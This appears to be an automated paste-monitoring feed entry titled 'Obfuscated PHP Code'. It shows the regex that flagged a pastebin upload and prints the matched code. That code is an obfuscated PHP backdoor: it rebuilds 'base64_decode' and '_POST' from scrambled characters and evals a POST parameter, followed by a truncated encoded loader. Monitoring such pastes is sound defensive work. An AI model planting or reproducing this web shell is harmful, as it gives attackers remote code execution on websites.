Quantcast
Channel: Obfuscated PHP Code – LeakedIn
Viewing all articles
Browse latest Browse all 222

Obfuscated PHP Code

$
0
0
Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n7639ac'])) {eval($s21(${$s20}['n7639ac']));}?><?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=29596;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYic Source: http://pastebin.com/raw.php?i=UKhHG0uE

Viewing all articles
Browse latest Browse all 222

Trending Articles